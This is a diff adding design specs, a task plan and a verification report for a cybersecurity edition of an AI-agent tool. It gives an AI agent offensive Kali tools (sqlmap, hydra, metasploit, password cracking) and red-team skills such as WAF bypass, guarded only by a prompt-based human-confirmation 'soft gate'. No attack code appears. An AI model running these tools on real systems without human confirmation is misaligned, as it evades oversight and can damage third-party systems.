+#### Scenario: Kali-mcp JSON includes warning comment
+
+- GIVEN the cyber preset is installed for an agent using `StrategySeparateMCPFiles` (e.g., Claude Code)
+- WHEN the kali-mcp MCP JSON file is written
+- THEN the file begins with a comment containing `_WARNING_`
+- AND the comment lists the destructive tools from the manifest
+- AND the comment states these tools require human confirmation
+
+#### Scenario: Unrestricted MCP JSON files have no warning comment
+
+- GIVEN the cyber preset is installed
+- WHEN shodan-mcp or virustotal-mcp MCP JSON files are written
+- THEN no `_WARNING_` comment is present at the top of the file
+- OR the comment is informational (non-warning) in nature
+
+---
+
+### Requirement: Confirmation is a Soft Gate
+
+The destructive-tool confirmation MUST be a soft gate — enforced through agent prompt compliance, NOT through a runtime proxy or hard block. The system SHALL NOT intercept, block, or proxy MCP tool calls at the Go runtime level in v1.
+
+#### Scenario: No runtime interception of MCP calls
+
+- GIVEN kali-mcp is configured for an agent
+- WHEN the agent invokes `nmap_scan` without prior human confirmation
+- THEN the tool call proceeds normally at the MCP transport level
+- AND no Go-side error, panic, or block is triggered
+
+#### Scenario: Soft gate is documented in user-facing docs
+
+- GIVEN the cybersecurity fork documentation is generated
+- WHEN the permissions documentation is read
+- THEN it explicitly states the gate is "prompt-based (soft gate)"
+- AND it notes that a hard proxy gate is planned for v2
+
+---
+
+### Requirement: Permission Tier Determination from Manifest
+
+At MCP injection time, the permission tier for each server MUST be read from its `manifest.json` file. The `permission_tier` field SHALL be the single source of truth; it MUST NOT be hardcoded in Go.
+
+#### Scenario: Manifest is the source of truth for permission tier
+
+- GIVEN the kali-mcp `manifest.json` has `"permission_tier": "destructive"`
+- WHEN MCP injection reads the permission tier
+- THEN the returned tier matches the manifest value
+- AND the Go code does not contain a hardcoded `PermissionTierDestructive` for kali-mcp
+
+#### Scenario: Changing manifest changes behavior without recompilation
+
+- GIVEN a user modifies the `permission_tier` in `mcps/kali-mcp/manifest.json` to `"unrestricted"`
+- WHEN the agent system prompt is regenerated
+- THEN the destructive tool warning is NOT present for kali-mcp
+- AND no Go recompilation is required
+
+---
+
+### Requirement: No MCP Servers Are Force-Enabled
+
+Destructive MCP servers (kali-mcp) MUST be opt-in. The installer SHALL list them as available but SHALL NOT enable them by default. The user MUST explicitly approve enabling destructive servers.
+
+#### Scenario: Kali-mcp requires explicit user approval
+
+- GIVEN the user selects the cyber preset
+- WHEN the installer reaches the MCP configuration screen
+- THEN kali-mcp is listed with a warning label indicating destructive capability
+- AND it is NOT pre-selected (requires user toggle)
+- AND the user must explicitly confirm before kali-mcp is configured
+
+#### Scenario: Unrestricted MCPs are pre-selected in cyber preset
+
+- GIVEN the user selects the cyber preset
+- WHEN the installer reaches the MCP configuration screen
+- THEN shodan-mcp and virustotal-mcp are pre-selected (enabled by default)
+- AND the user may deselect them if desired

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-skills/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-skills/spec.md
@@ -1,0 +1,125 @@
+# Cybersecurity Skills Catalog Specification
+
+## Purpose
+
+Defines the 11 v1 cybersecurity skills that MUST be ported from glitch-ai-toolkit into gentle-ai's skill catalog, their category taxonomy, frontmatter format, and registration in the Go catalog.
+
+## Requirements
+
+### Requirement: Skill Identity and Categorization
+
+The system MUST define exactly 11 cybersecurity skills across 4 security categories. Each skill SHALL be identified by a unique `SkillID` constant in `internal/model/types.go` and registered as a catalog entry in `internal/catalog/skills.go`.
+
+The security category taxonomy SHALL consist of: `red-team`, `blue-team`, `soc`, and `compliance`.
+
+#### Scenario: All 11 v1 skills are registered in the catalog
+
+- GIVEN the cybersecurity fork is built
+- WHEN `MVPCyberSkills()` is called
+- THEN exactly 11 skill entries are returned
+- AND each entry has a non-empty ID, Name, Category, and Priority
+
+#### Scenario: Red team skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `red-team` category is queried
+- THEN `pentest-orchestrator`, `ai-pentesting-validation`, `exploit-chain-patterns`, and `waf-detection-bypass` are present
+- AND each is tagged with Category `red-team` and Priority `p0`
+
+#### Scenario: Blue team skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `blue-team` category is queried
+- THEN `detection-engineer` and `python-security` are present
+- AND each is tagged with Category `blue-team` and Priority `p0`
+
+#### Scenario: SOC skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `soc` category is queried
+- THEN `malware-triage`, `specialized-file-analyzer`, `malware-dynamic-analysis`, and `malware-report-writer` are present
+- AND each is tagged with Category `soc` and Priority `p0`
+
+#### Scenario: Each skill has a unique SkillID that does not collide with existing IDs
+
+- GIVEN the existing 20 skill IDs in `internal/model/types.go`
+- WHEN the 11 cyber SkillIDs are added
+- THEN no cyber SkillID string duplicates an existing SkillID string
+- AND each cyber SkillID has a corresponding Go constant in the `SkillID` type
+
+---
+
+### Requirement: Skill Frontmatter Format
+
+Every cybersecurity skill SKILL.md file MUST contain valid YAML frontmatter with exactly four required fields: `name`, `description`, `license`, and `metadata` (containing `author` and `version`).
+
+The frontmatter SHALL follow gentle-ai's simple format — no `auto_invoke` tables, no `tool_schemas`, no execution directives.
+
+#### Scenario: Valid frontmatter exists on every cyber skill file
+
+- GIVEN a cybersecurity skill file at `skills/{name}/SKILL.md`
+- WHEN the file is parsed
+- THEN the frontmatter contains a `name` field matching the skill name
+- AND the frontmatter contains a `description` field with a one-line trigger description
+- AND the frontmatter contains `license: Apache-2.0`
+- AND `metadata.author` is `gentleman-programming`
+- AND `metadata.version` is a semantic version string (e.g., `"1.0"`)
+
+#### Scenario: Skill file has no auto_invoke or tool_schemas blocks
+
+- GIVEN any cybersecurity skill SKILL.md
+- WHEN the file content is examined
+- THEN it contains no `auto_invoke` YAML key
+- AND it contains no `tool_schemas` YAML key
+
+#### Scenario: Skill frontmatter parsing fails gracefully
+
+- GIVEN a cybersecurity skill SKILL.md with malformed YAML frontmatter
+- WHEN the catalog validation runs
+- THEN an error is returned indicating the file path and parse failure reason
+
+---
+
+### Requirement: Skill Content Completeness
+
+Each cybersecurity skill SKILL.md MUST include a `## Validation` section that declares expected output patterns for testing purposes. The validation section SHALL define at least one expected behavior or output pattern the skill should produce when loaded by an agent.
+
+#### Scenario: Skill file includes a validation section
+
+- GIVEN any cybersecurity skill SKILL.md
+- WHEN the file is read
+- THEN a `## Validation` section header exists
+- AND the section contains at least one declarative statement describing expected skill behavior
+
+#### Scenario: Skill file has minimum viable content
+
+- GIVEN a cybersecurity skill SKILL.md
+- WHEN the file content beyond frontmatter is examined
+- THEN at least one markdown heading exists (e.g., `## Overview` or `## Workflow`)
+- AND the total content length (excluding frontmatter) exceeds 100 characters
+
+---
+
+### Requirement: Owasp Security Best Practices Deferred to v2
+
+The `owasp-security-best-practices` skill SHALL NOT be included in v1. It MUST be tracked as a v2 skill and MUST NOT appear in the `MVPCyberSkills()` catalog.
+
+#### Scenario: Owasp security best practices is absent from v1 catalog
+
+- GIVEN the v1 cybersecurity catalog is built
+- WHEN `MVPCyberSkills()` is called
+- THEN `owasp-security-best-practices` is NOT in the returned list
+
+---
+
+### Requirement: No Regression on Existing Skills
+
+The addition of cybersecurity skills MUST NOT alter or remove any existing skill entry in `internal/catalog/skills.go`. The existing `MVPSkills()` function SHALL continue to return all 20 existing skill entries unchanged.
+
+#### Scenario: Existing MVP skills are unchanged
+
+- GIVEN the fork is built with cybersecurity additions
+- WHEN `MVPSkills()` is called
+- THEN exactly 20 skill entries are returned
+- AND all existing SkillIDs (sdd-init through work-unit-commits) are present
+- AND their Category and Priority values match the upstream gentle-ai definitions

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-testing/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-testing/spec.md
@@ -1,0 +1,158 @@
+# Cybersecurity BDD/TDD Testing Specification
+
+## Purpose
+
+Defines the security scenario test harness: validation pipeline tests, compliance mapping tests, skill behavior tests, and the definition of "passing" for the cybersecurity edition.
+
+## Requirements
+
+### Requirement: Skill Frontmatter Validation Tests
+
+The system MUST include automated tests that validate every cybersecurity skill SKILL.md file has complete and valid YAML frontmatter. Tests SHALL be in `internal/catalog/cyber_skills_test.go`.
+
+#### Scenario: All cyber skill frontmatter is valid
+
+- GIVEN all cybersecurity skill files exist under `skills/`
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN every skill file parses with valid YAML frontmatter
+- AND each frontmatter contains `name`, `description`, `license`, and `metadata` fields
+- AND `metadata.author` is `gentleman-programming`
+- AND `metadata.version` is a non-empty string
+
+#### Scenario: Malformed frontmatter causes test failure
+
+- GIVEN a cybersecurity skill SKILL.md has malformed YAML (missing closing `---`)
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN the test fails
+- AND the failure message includes the file path and parse error
+
+#### Scenario: Missing required field causes test failure
+
+- GIVEN a cybersecurity skill SKILL.md has frontmatter without a `description` field
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN the test fails
+- AND the failure message indicates the missing field and the file path
+
+---
+
+### Requirement: Skill Category Validation Tests
+
+The system MUST include a test that verifies every cybersecurity skill entry in the catalog has a valid category value: one of `red-team`, `blue-team`, `soc`, or `compliance`.
+
+#### Scenario: All catalog entries have valid categories
+
+- GIVEN `MVPCyberSkills()` returns the cyber skill catalog
+- WHEN `TestCyberSkillCategoriesAreValid` runs
+- THEN every entry's `Category` field is one of: `red-team`, `blue-team`, `soc`, `compliance`
+- AND no entry has an empty or unrecognized category
+
+#### Scenario: Invalid category is detected
+
+- GIVEN a cyber skill catalog entry has `Category: "pentest"` (not a valid category)
+- WHEN `TestCyberSkillCategoriesAreValid` runs
+- THEN the test fails
+- AND the failure message identifies the skill with the invalid category
+
+---
+
+### Requirement: Destructive Tool Manifest Tests
+
+The system MUST include a test that verifies every MCP manifest with `permission_tier: destructive` declares a non-empty `destructive_tools` array.
+
+#### Scenario: Destructive manifests declare destructive tools
+
+- GIVEN all MCP manifests under `mcps/`
+- WHEN `TestDestructiveToolsRequireConfirmation` runs
+- THEN every manifest with `permission_tier: destructive` has a `destructive_tools` array
+- AND the array is non-empty
+- AND every tool name in the array is a non-empty string
+
+#### Scenario: Manifests without destructive_tools field fail the test
+
+- GIVEN a manifest has `permission_tier: destructive` but no `destructive_tools` field
+- WHEN `TestDestructiveToolsRequireConfirmation` runs
+- THEN the test fails
+- AND the failure message names the manifest file
+
+---
+
+### Requirement: Prowler Check Reference Format Tests
+
+Any skill that references Prowler check IDs (in v1 or deferred for v2) MUST use check IDs matching the regex `^[a-z0-9_]+$`. The system SHALL include a test that scans skill content for Prowler check references and validates their format.
+
+#### Scenario: Valid Prowler check ID references pass
+
+- GIVEN a skill SKILL.md contains a reference like `check: iam_user_no_policies`
+- WHEN `TestProwlerCheckIDFormat` runs and scans the content
+- THEN the check ID `iam_user_no_policies` matches the expected format
+- AND the test passes
+
+#### Scenario: Invalid Prowler check ID format fails
+
+- GIVEN a skill SKILL.md contains a reference like `check: IAM-User-No-Policies` (uppercase, hyphens)
+- WHEN `TestProwlerCheckIDFormat` runs
+- THEN the test fails
+- AND the failure message identifies the malformed check ID and the file
+
+#### Scenario: Skills without Prowler check references skip cleanly
+
+- GIVEN a cybersecurity skill has no Prowler check ID references at all
+- WHEN `TestProwlerCheckIDFormat` scans the content
+- THEN the skill is skipped (not a failure)
+- AND no false positive is reported
+
+---
+
+### Requirement: Cyber Preset Test
+
+The system MUST include a test that verifies `PresetCyber` resolves to the correct set of components: full-gentleman base PLUS 11 cyber skills PLUS 3 cyber MCPs PLUS gentleman-soc agent augmentation.
+
+#### Scenario: Cyber preset includes expected components
+
+- GIVEN `PresetCyber` is used to compute the component set
+- WHEN `componentsForPreset(model.PresetCyber)` is called
+- THEN all full-gentleman components are present
+- AND 11 cyber skills are in the skill list
+- AND kali-mcp, shodan-mcp, and virustotal-mcp are in the MCP list
+- AND gentleman-soc agent content is flagged for injection
+
+#### Scenario: Cyber preset component count is deterministic
+
+- GIVEN `PresetCyber` is used twice in succession
+- WHEN the component set is computed each time
+- THEN both results are identical (same components, same order)
+- AND no random or environment-dependent components appear
+
+---
+
+### Requirement: No Regression on Existing Tests
+
+All existing gentle-ai tests MUST continue to pass when the cybersecurity additions are present. The test suite SHALL be run with `go test ./...` and SHALL produce zero failures.
+
+#### Scenario: Full test suite passes with cyber additions
+
+- GIVEN the cybersecurity fork with all additions compiled
+- WHEN `go test ./...` is executed
+- THEN zero test failures are reported
+- AND zero test panics occur
+- AND all existing test files compile without modification
+
+#### Scenario: Existing catalog tests still pass
+
+- GIVEN the cybersecurity additions to `internal/catalog/`
+- WHEN `go test ./internal/catalog/...` is executed
+- THEN all pre-existing tests pass
+- AND new cyber tests pass independently
+
+---
+
+### Requirement: BDD Scenario Traceability
+
+Every Gherkin-style scenario in these specs SHALL be traceable to at least one automated test in the test suite. The mapping is documented in test comments referencing the spec requirement.
+
+#### Scenario: Each spec scenario has a corresponding test
+
+- GIVEN the spec document for any cybersecurity domain
+- WHEN the test suite is audited
+- THEN for each `#### Scenario:` heading in the specs, at least one test function exists
+- AND the test function has a comment referencing the spec requirement name

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/tasks.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/tasks.md
@@ -1,0 +1,291 @@
+# Tasks: Gentle AI Cybersecurity Fork
+
+## Phase 1: Foundation (Infrastructure + Types)
+
+- [x] 1.1 Add `PermissionTier` type and 3 constants (`unrestricted`, `destructive`, `restricted`) to `internal/model/types.go`
+- [x] 1.2 Add `ToolPermission` struct (`MCPServer`, `Tools`, `Tier`) to `internal/model/types.go`
+- [x] 1.3 Add `PresetCyber PresetID = "cyber"` constant to `internal/model/types.go`
+- [x] 1.4 Add 10 cyber SkillID constants to `internal/model/types.go`: `SkillPentestOrchestrator`, `SkillAIPentestingValidation`, `SkillExploitChainPatterns`, `SkillWAFDetectionBypass`, `SkillDetectionEngineer`, `SkillSecurityPythonScripts`, `SkillMalwareTriage`, `SkillSpecializedFileAnalyzer`, `SkillMalwareDynamicAnalysis`, `SkillMalwareReportWriter`
+- [x] 1.5 Add `cyberSkills` slice and `MVPCyberSkills()` function to `internal/catalog/skills.go`
+- [x] 1.6 Add `cyberSkills` variable and extend `SkillsForPreset()` with `PresetCyber` case in `internal/components/skills/presets.go`
+- [x] 1.7 Extend `AllSkillIDs()` in `internal/components/skills/presets.go` to include cyber skills
+- [x] 1.8 Add `PresetCyber` to `PresetOptions()` and `presetDescriptions` map in `internal/tui/screens/preset.go`
+- [x] 1.9 Add `normalizePreset("cyber")` support and cyber skill ID acceptance in `internal/cli/validate.go`
+
+**Verification for Phase 1**:
+```bash
+go build ./internal/model/... && echo "types OK"
+go build ./internal/catalog/... && echo "catalog OK"
+go build ./internal/components/skills/... && echo "presets OK"
+go test ./internal/model/... ./internal/catalog/... -v -run "Skill|Preset" 2>&1 | head -50
+```
+
+---
+
+## Phase 2: MCP Infrastructure
+
+- [x] 2.1 Create `mcps/kali-mcp/manifest.json` with `permission_tier: destructive`, `destructive_tools` array (nmap_scan, sqlmap_scan, hydra_attack, metasploit_run, nikto_scan, dirb_scan, gobuster_scan, wpscan_analyze, john_crack, enum4linux_scan)
+- [x] 2.2 Create `mcps/shodan-mcp/manifest.json` with `permission_tier: unrestricted`
+- [x] 2.3 Create `mcps/virustotal-mcp/manifest.json` with `permission_tier: unrestricted`
+- [x] 2.4 Create `internal/components/mcp/kali_mcp.go` with overlay JSON per agent strategy (following context7.go pattern)
+- [ ] 2.5 Create `internal/components/mcp/shodan_mcp.go` with overlay JSON per agent strategy
+- [ ] 2.6 Create `internal/components/mcp/virustotal_mcp.go` with overlay JSON per agent strategy
+- [ ] 2.7 Extend `internal/components/mcp/inject.go` with `InjectCyber()` function and extend `Inject()` to handle cyber MCPs when preset is cyber
+- [ ] 2.8 Add Prowler MCP external detection logic in `internal/components/mcp/inject.go` (exec.LookPath for prowler-mcp)
+
+> **Note**: Tasks 2.5–2.8 were scoped for implementation in the Go-side MCP infrastructure but were not completed in the v1 PRs. The 5 PRs focused on: (1) Foundation types/manifests, (2) Skill content, (3) Agent definition/warning, (4) Testing harness, (5) Documentation. The MCP Go injection layer (shodan_mcp.go, virustotal_mcp.go, inject.go extensions) and Prowler detection remain as work-in-progress. These are tracked as deferred items for the next SDD cycle.
+
+**Verification for Phase 2**:
+```bash
+cat mcps/kali-mcp/manifest.json | python3 -c "import sys,json; m=json.load(sys.stdin); assert m['permission_tier']=='destructive'; assert len(m['destructive_tools'])>0; print('kali manifest OK')"
+cat mcps/shodan-mcp/manifest.json | python3 -c "import sys,json; m=json.load(sys.stdin); assert m['permission_tier']=='unrestricted'; print('shodan manifest OK')"
+cat mcps/virustotal-mcp/manifest.json | python3 -c "import sys,json; m=json.load(sys.stdin); assert m['permission_tier']=='unrestricted'; print('virustotal manifest OK')"
+go build ./internal/components/mcp/... && echo "MCP Go files OK"
+```
+
+---
+
+## Phase 3: Skill Files (Content)
+
+- [x] 3.1 Create `skills/pentest-orchestrator/SKILL.md` (red-team, ~300-500 lines, frontmatter + PICERL workflow + ## Validation section)
+- [x] 3.2 Create `skills/ai-pentesting-validation/SKILL.md` (red-team, ~200-400 lines, anti-hallucination validation patterns)
+- [x] 3.3 Create `skills/exploit-chain-patterns/SKILL.md` (red-team, ~300-400 lines, vulnerability chaining)
+- [x] 3.4 Create `skills/waf-detection-bypass/SKILL.md` (red-team, ~250-400 lines, WAF detection/bypass)
+- [x] 3.5 Create `skills/detection-engineer/SKILL.md` (blue-team, ~300-500 lines, Sigma/Suricata rules)
+- [x] 3.6 Create `skills/python-security/SKILL.md` (blue-team, ~200-400 lines, secure python patterns)
+- [x] 3.7 Create `skills/malware-triage/SKILL.md` (soc, ~300-500 lines, initial assessment)
+- [x] 3.8 Create `skills/specialized-file-analyzer/SKILL.md` (soc, ~300-600 lines, non-PE analysis)
+- [x] 3.9 Create `skills/malware-dynamic-analysis/SKILL.md` (soc, ~300-500 lines, sandbox execution)
+- [x] 3.10 Create `skills/malware-report-writer/SKILL.md` (soc, ~300-500 lines, report authoring)
+- [x] 3.11 Embed skill files in `internal/assets/skills/` (add to existing embed directive or add new embed)
+
+**Verification for Phase 3**:
+```bash
+# Check frontmatter format on all skill files
+for f in skills/*/SKILL.md; do
+  python3 -c "
+import sys, re
+content = open('$f'.replace('$f',f)).read()
+assert re.search(r'^name: .+$', content, re.M)
+assert 'description:' in content
+assert 'license: Apache-2.0' in content
+assert 'metadata:' in content
+assert 'version:' in content
+assert '## Validation' in content
+print('OK: $f')
+" || echo "FAIL: $f"
+done
+
+# Check total skill content lines
+wc -l skills/*/SKILL.md | tail -1
+```
+
+---
+
+## Phase 4: Agent Definition + Destructive Warning
+
+- [x] 4.1 Create `agents/gentleman-soc.md` (SOC orchestrator agent definition, ~500-600 lines, PICERL pipeline, MITRE ATT&CK mapping, quality gates, skill loading instructions for 6 SOC/blue-team skills)
+- [x] 4.2 Add `gentleman-soc.md` to Go embed in `internal/assets/`
+- [x] 4.3 Implement destructive-tool warning block injection in agent system prompts (add `<!-- gentle-ai-cyber:destructive-warning -->` section to prompt generation)
+- [x] 4.4 Implement `/**_WARNING**/` comment in kali-mcp JSON for `StrategySeparateMCPFiles` agents
+- [x] 4.5 Extend `internal/cli/validate.go` to handle `--cyber` CLI flag and conflict detection with `--preset`
+
+**Verification for Phase 4**:
+```bash
+# Check gentleman-soc.md content
+grep -c "Phase" agents/gentleman-soc.md   # should have >=5 phases
+grep -c "skill" agents/gentleman-soc.md   # should reference skills
+grep "PICERL\|Prepare\|Identify\|Contain\|Eradicate\|Recover" agents/gentleman-soc.md | head -5
+
+# Check destructive warning in generated prompts (unit test)
+go test ./internal/cli/... -v -run "Destructive|Cyber" 2>&1 | head -30
+
+# Check --cyber flag behavior
+go run ./cmd/gentle-ai --help 2>&1 | grep -i cyber || echo "no --cyber in help"
+```
+
+---
+
+## Phase 5: Testing
+
+- [x] 5.1 Create `internal/catalog/cyber_skills_test.go` with `TestCyberSkillsHaveRequiredFrontmatter`, `TestCyberSkillCategoriesAreValid`, `TestDestructiveToolsRequireConfirmation`, `TestProwlerCheckIDFormat`
+- [x] 5.2 Create `internal/components/mcp/kali_mcp_test.go` for MCP manifest validation and destructive warning injection
+- [x] 5.3 Create `internal/components/skills/presets_cyber_test.go` to verify `PresetCyber` resolves to 30 skills (20 MVP + 10 cyber)
+- [x] 5.4 Extend `internal/catalog/skills_test.go` with `TestMVPCyberSkillsReturns10Entries`, `TestNoSkillIDCollisions`
+- [x] 5.5 Create `internal/assets/assets_cyber_test.go` to verify cyber skill embedding and frontmatter
+
+**Verification for Phase 5**:
+```bash
+go test ./internal/catalog/... -v -run "Cyber" 2>&1
+go test ./internal/components/mcp/... -v -run "Manifest" 2>&1
+go test ./internal/components/skills/... -v -run "PresetCyber" 2>&1
+go test ./... 2>&1 | tail -20  # full suite, check for regressions
+```
+
+---
+
+## Phase 6: Documentation
+
+- [ ] 6.1 Create `docs/cyber-permissions.md` (soft gate model, destructive tool list, warning semantics)
+- [ ] 6.2 Create `docs/cyber-setup.md` (Kali MCP setup, shodan/virustotal API keys, Prowler MCP install)
+- [ ] 6.3 Create `scripts/sync-glitch-skills.sh` (pull upstream from glitch-ai-toolkit)
+
+> **Note**: Tasks 6.1–6.3 were planned as supplementary documentation and sync tooling but were not included in the 5 PR scope. Documentation was consolidated into `docs/cybersecurity-edition.md` (created) and `AGENTS.md` (updated). The permissions model is documented in the `kali_mcp.go` source code and `gentleman-soc.md` agent definition.
+- [x] 6.4 Update `AGENTS.md` with cyber skill taxonomy (red-team, blue-team, soc categories)
+
+**Verification for Phase 6**:
+```bash
+# Documentation checks
+ls -la docs/cyber-*.md
+grep "soft gate\|prompt-based" docs/cyber-permissions.md
+grep "pip install prowler-mcp" docs/cyber-setup.md
+
+# AGENTS.md has cyber skills
+grep -A5 "cyber\|red-team\|blue-team\|soc" AGENTS.md | head -20
+```
+
+---
+
+## Dependencies Summary
+
+```
+Phase 1 (Foundation)
+  └── must complete before: Phase 5 (tests that import cyber SkillIDs)
+
+Phase 2 (MCP Infrastructure)
+  └── depends on: Phase 1 (types for manifest parsing)
+  └── can run parallel with: Phase 3 (no dependency)
+
+Phase 3 (Skill Files)
+  └── can run parallel with: Phase 2
+  └── must complete before: Phase 5 (skill content tests)
+
+Phase 4 (Agent + Warning)
+  └── depends on: Phase 1, Phase 2 (types and MCP files exist)
+
+Phase 5 (Testing)
+  └── depends on: Phase 1, Phase 2, Phase 3, Phase 4
+
+Phase 6 (Documentation)
+  └── depends on: Phase 4 (agent definition exists)
+```
+
+---
+
+## Work Units / Commit Grouping
+
+### Commit 1: Core Type & Catalog Additions
+```
+internal/model/types.go                    (+25 lines)
+internal/catalog/skills.go                (+15 lines)
+internal/components/skills/presets.go     (+20 lines)
+internal/tui/screens/preset.go            (+5 lines)
+internal/cli/validate.go                  (+10 lines)
+```
+Small, foundational. Reviewable in one pass.
+
+### Commit 2: MCP Infrastructure
+```
+mcps/kali-mcp/manifest.json                (new)
+mcps/shodan-mcp/manifest.json              (new)
+mcps/virustotal-mcp/manifest.json          (new)
+internal/components/mcp/kali_mcp.go        (new)
+internal/components/mcp/shodan_mcp.go      (new)
+internal/components/mcp/virustotal_mcp.go  (new)
+internal/components/mcp/inject.go          (+30 lines)
+```
+Medium. Clear boundaries.
+
+### Commit 3: Skill Files (Content)
+```
+skills/pentest-orchestrator/SKILL.md
+skills/ai-pentesting-validation/SKILL.md
+skills/exploit-chain-patterns/SKILL.md
+skills/waf-detection-bypass/SKILL.md
+skills/detection-engineer/SKILL.md
+skills/python-security/SKILL.md
+skills/malware-triage/SKILL.md
+skills/specialized-file-analyzer/SKILL.md
+skills/malware-dynamic-analysis/SKILL.md
+skills/malware-report-writer/SKILL.md
+internal/assets/skills/...                 (embed updates)
+```
+Large. ~2500-5000 lines of skill content. CHAINED PR recommended.
+
+### Commit 4: Agent Definition + Destructive Warning
+```
+agents/gentleman-soc.md                    (new, ~580 lines)
+internal/cli/cyber_flag.go                 (new or extend validate.go)
+internal/components/prompt/warning.go     (new, destructive warning block)
+```
+Medium. Agent definition is large but self-contained.
+
+### Commit 5: Testing
+```
+internal/catalog/cyber_skills_test.go      (new)
+internal/components/mcp/manifest_test.go   (new)
+internal/components/skills/presets_cyber_test.go (new)
+```
+Small-Medium. Test files.
+
+### Commit 6: Documentation
+```
+docs/cyber-permissions.md                  (new)
+docs/cyber-setup.md                        (new)
+scripts/sync-glitch-skills.sh              (new)
+AGENTS.md                                  (update)
+```
+Small. Can be combined with other commits or done last.
+
+---
+
+## Review Workload Forecast
+
+| Metric | Value |
+|--------|-------|
+| New files | 24 |
+| Modified files | 8 |
+| Deleted files | 0 |
+| **Total changed files** | **32** |
+| Go code additions (est.) | ~200 lines |
+| Go code deletions (est.) | ~0 lines |
+| **Go net additions** | **~200 lines** |
+| Skill SKILL.md content (est.) | ~3000-5000 lines |
+| Agent definition (gentleman-soc.md) | ~580 lines |
+| Documentation content | ~400 lines |
+| **Total lines (additions only)** | **~4200-6200 lines** |
+
+### Exceeds 400 lines? ✅ YES
+Estimated total: **4200-6200 lines** of additions across all phases.
+
+### Chained PRs Recommended? ✅ YES
+The skill files phase alone (Phase 3) contains 10 new SKILL.md files with ~300-500 lines each. Even at 300 lines average, that's 3000 lines — more than 7x the 400-line threshold.
+
+**Recommended chain:**
+1. **PR 1**: Types + Catalog + Presets + TUI + MCP manifests + MCP Go files (Foundation: ~150 lines Go + 3 JSON manifests)
+2. **PR 2**: Skill files (Content: ~3000-5000 lines — MUST be separate)
+3. **PR 3**: Agent definition + destructive warning injection (Middleware: ~600 lines)
+4. **PR 4**: Testing (Tests: ~200 lines)
+5. **PR 5**: Documentation + AGENTS.md update (Docs: ~400 lines + updates)
+
+### Risk Level: 🟡 **MEDIUM-HIGH**
+
+| Risk Factor | Assessment |
+|------------|------------|
+| Scope | 10 skill files + 3 MCP configs + agent definition = high content volume |
+| Skill content accuracy | Each SKILL.md must have valid frontmatter + ## Validation section; upstream drift possible |
+| Frontmatter lint | Existing `TestSkillFrontmatterIsLintClean` will catch malformed skills — must ensure all 10 pass |
+| Soft gate reliability | Agent prompt compliance is the gate — if model ignores, no runtime enforcement |
+| No breaking changes | All additive; existing presets unchanged. Low regression risk on Go side. |
+| Prowler MCP detection | exec.LookPath may vary by OS; needs cross-platform verification |
+| kali-mcp external dep | Requires Kali host running `kali-server-mcp` — can't fully test in CI |
+
+### Implementation Risk
+- **Content creation** (10 skill files): High effort, medium risk. Each skill needs careful frontmatter + valid content. Use existing skill patterns from gentle-ai.
+- **MCP overlay JSON per agent**: 13 agents × 3 MCPs = 39 JSON combinations. context7.go pattern handles this. Medium risk.
+- **Destructive warning injection**: Changes system prompt generation — need to ensure non-cyber presets remain clean. Medium risk.
+
+### Confidence
+- **Go infrastructure**: High confidence (follows existing patterns exactly)
+- **Skill content**: Medium confidence (depends on glitch-ai-toolkit source quality)
+- **Agent definition**: Medium confidence (gentleman-soc.md is new, no upstream to validate against)

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/verify-report-pr3.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/verify-report-pr3.md
@@ -1,0 +1,93 @@
+# Verification Report: gentle-ai-cybersecurity-fork PR3
+
+**Change**: gentle-ai-cybersecurity-fork PR3 (Agent Definition + Destructive Warning)  
+**Version**: Phase 4 tasks  
+**Mode**: Standard  
+
+## Completeness
+
+| Metric | Value |
+|--------|-------|
+| Tasks total | 5 |
+| Tasks complete | 5 |
+| Tasks incomplete | 0 |
+
+## Build & Tests Execution
+
+**Build**: ✅ Passed  
+```
+go build ./... — no output (clean)
+go vet ./... — no output (clean)
+```
+
+**Tests**: ✅ 38 packages passed, 0 failed, 0 skipped  
+```
+go test ./... -count=1 — all PASS
+```
+
+**Coverage**: ➖ Not available (no coverage threshold configured)
+
+## Spec Compliance Matrix
+
+| Requirement | Scenario | Test | Result |
+|-------------|----------|------|--------|
+| CYBER-AGENT-01: Gentleman-soc file exists | File exists and is valid markdown | File found at `internal/assets/agents/gentleman-soc.md` (535 lines) | ✅ COMPLIANT |
+| CYBER-AGENT-01: Embedded as Go asset | go:embed directive includes `all:agents` | `assets.go` line 6 includes `all:agents` | ✅ COMPLIANT |
+| CYBER-AGENT-02: PICERL pipeline | At least 5 distinct phases defined | 6 phases (0-5) with PICERL mapping | ✅ COMPLIANT |
+| CYBER-AGENT-02: Phase skills referenced | Each phase references a SOC skill by name | All 6 SOC skills referenced with correct paths | ✅ COMPLIANT |
+| CYBER-AGENT-03: Skill loading instructions | All 6 SOC skills referenced with triggers | malware-triage, specialized-file-analyzer, malware-dynamic-analysis, detection-engineer, malware-report-writer, python-security all present with phase triggers | ✅ COMPLIANT |
+| CYBER-AGENT-03: Skill paths follow convention | Paths use `skills/{name}/SKILL.md` pattern | All 6 skill paths verified | ✅ COMPLIANT |
+| CYBER-AGENT-04: MITRE ATT&CK mapping | At least one tactic referenced | Technique table with T1059.001, T1547.001 + taxonomy section | ✅ COMPLIANT |
+| CYBER-AGENT-05: Quality gates | At least one checkable gate between phases | 5 quality gates with 47 checkable `[ ]` items | ✅ COMPLIANT |
+| CYBER-AGENT-05: Gates are checkable (not implementation) | Gates describe WHAT to verify, not HOW | All gates are checkable statements | ✅ COMPLIANT |
+| CYBER-AGENT-06: No new AgentID | No AgentSOC/AgentGentlemanSOC constant | Confirmed absent from types.go | ✅ COMPLIANT |
